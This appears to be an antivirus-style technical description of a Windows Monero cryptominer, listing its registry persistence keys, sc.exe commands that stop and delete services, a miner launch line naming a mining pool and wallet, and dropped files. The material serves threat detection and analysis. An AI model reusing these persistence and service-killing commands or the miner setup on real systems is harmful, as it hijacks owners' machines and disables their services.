Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\Serverdetections] 'ImagePath' = '%WINDIR%\Media\Moneroor\nsems.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\Serverdetections] 'Start' = '00000002'
- '<SYSTEM32>\sc.exe' stop ╘╞╝ь▓т┐╪╓╞╞ў
- '<SYSTEM32>\sc.exe' delete ╘╞╝ь▓т┐╪╓╞╞ў
- '%WINDIR%\Media\Moneroor\nsems.exe' install Serverdetections Mrolsmic.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 49khxCxN3xLJmmYnmtei2Z2gH4WZWi9NC8A1WCnBnKLcEN6JjxBykpwc59f21KZcLR2JMuFqToxim3cKCoCM5w6i62NqqaC ...
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Media\Moneroor\3.bat" "
- '<SYSTEM32>\sc.exe' stop Windowssecurityservice
- '<SYSTEM32>\sc.exe' delete Windowssecurityservice
- %WINDIR%\Media\Moneroor\nsems.exe
- %WINDIR%\Media\Moneroor\Mrolsmic.exe
- %WINDIR%\Media\Moneroor\ssleay32.dll
- %WINDIR%\Media\Moneroor\3.bat
- %WINDIR%\Media\Moneroor\zlib1.dll
- %WINDIR%\Media\Moneroor\libeay32.dll
- %WINDIR%\Media\Moneroor\libcurl.dll
- %WINDIR%\Media\Moneroor\libgcc_s_seh-1.dll
- %WINDIR%\Media\Moneroor\libwinpthread-1.dll
- %WINDIR%\Media\Moneroor\libstdc++-6.dll
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''